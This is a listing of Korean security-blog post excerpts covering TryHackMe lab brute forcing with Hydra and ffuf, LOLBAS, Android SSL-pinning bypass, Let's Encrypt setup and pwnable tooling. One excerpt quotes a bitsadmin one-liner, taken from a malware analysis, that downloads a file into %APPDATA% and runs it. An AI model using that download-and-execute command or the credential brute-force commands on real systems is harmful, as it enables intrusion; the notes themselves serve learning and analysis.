-
Hydra는 브루트포스를 수행하는데 사용되는 툴로 매우 빠르고 FTP, SSH등 여러 프토로콜을 지원한다. Tryhackme 문제 가운데 Lookup 문제를 푸는 과정에서 hydra를 사용한 기록을 남겨둔다. $ hydra -l think -P list.txt ssh://lookup.thm Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes […]
-
FFuf 툴은 웹 애플리케이션 퍼징(Fuzzing) 툴로 URL이나 POST 값 등에 대해 공격할 수 있다. 공식 사이트 : https://github.com/ffuf/ffuf Tryhackme 사이트의 Lookup 문제를 푸는 과정에서 해당 툴을 사용하게 되었는데 입력값은 다음과 같다. $ ffuf -w /usr/share/wordlists/rockyou.txt -X POST -u http://lookup.thm/login.php -d 'username=admin&password=FUZZ' -H "Content-Type: application/x-www-form-urlencoded" -fw 8 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ […]
-
가끔 msi로 된 파일 내부 파일을 추출하여 악성코드를 검사할 필요가 있을때가 있다. 그럴때 유용한 명령어라고 생각한다. msiexec /a 파일명.msi targetdir="c:\temp" /qn
-
Living off the Land의 사전적 의미는 땅에서 생활하기, 자급자족 이런 의미로 보이는데 악성코드 분야에서 의미는 시스템 안에서 자급자족 한다는 의미가 되겠다. 즉, 시스템에서 제공하는 여러 명령어를 활용한다는 의미로 악성코드의 AV 회피, 다운사이징 등에 활용되고 있다. 이와 관련 ‘LOLBAS 프로젝트’가 있는데 해당 프로젝트의 목표는 Living off the Land 기술에 사용할 수 있는 모든 바이너리, 스크립트 및 […]
-
일반적으로 HTTPS 패킷은 Burp Suite 인증서를 설치해 MITM 공격을 통해 확인할 수 있다. 하지만 안드로이드 7.0부터는 사용자 인증서를 신뢰하지 않도록 하는 옵션(SSL-Pinning)이 디폴트로 설정되어 있다. 참조 : https://developer.android.com/privacy-and-security/security-config?hl=ko#CustomTrust 따라서 안드로이드 apk 파일을 아래와 같이 조작해줄 필요가 있다. APK 언패키징 -> 인증서 관련 설정 변경 -> APK 리패키징 -> APK 서명 이러한 과정을 차근차근 할수도 있겠지만 […]
-
그동안 클라우드플레어를 통해 ‘Flexible SSL’을 쓰고 있었는데 이번 기회에 Let’s Encrypt 인증서 설치를 시도해 해보았습니다. 카페24에서 외부인증서를 등록해주는 기능이 있어 가능할 것으로 보였습니다. 먼저 윈도우용 Let’s Encrypt 프로그램 ‘win-acme’을 다운로드 합니다. https://www.win-acme.com/ 그리고 프로그램 실행후 아래와 같이 순차적으로 진행합니다. 1. 인증서 생성 N: Create certificate (default settings) M: Create certificate (full options) R: Run renewals […]
-
악성코드 분석글을 읽다 윈도우 환경에서 wget 명령어와 유사하게 파일을 다운로드 할 수 있는 기본 명령어가 있어 메모해 둡니다. ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://example.com/a.bin "%APPDATA%\a.exe">nul&start %APPDATA%\a.exe 본 명령어는 Windows 7 이후부터 기본 명령어로 탑재된 것으로 보입니다. 출처 : https://isc.sans.edu/forums/diary/Microsoft+BITS+Used+to+Download+Payloads/21027
-
[pwntools] sudo apt-get install build-essential libssl-dev libffi-dev python-dev binutils binutils-dev python2.7 python2.7-dev python-pip sudo pip install pwntools [peda] sudo apt-get install git git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py" >> ~/.gdbinit
-
최근 pwnable.kr 문제 중 tiny_easy를 풀다 checksec 결과에서 NX 값이 잘못 표시되는 것을 확인하고 포스팅 합니다. tester@ubuntu:~$ gdb tiny_easy GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO […]
-
문제 바이너리의 보안설정을 확인할 수 있는 스크립트다. http://www.trapkit.de/tools/checksec.html tester@ubuntu:~$ file tiny_easy tiny_easy: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size tester@ubuntu:~$ ./checksec.sh –file tiny_easy RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO No canary found NX enabled No PIE No RPATH No RUNPATH tiny_easy 이 외에 […]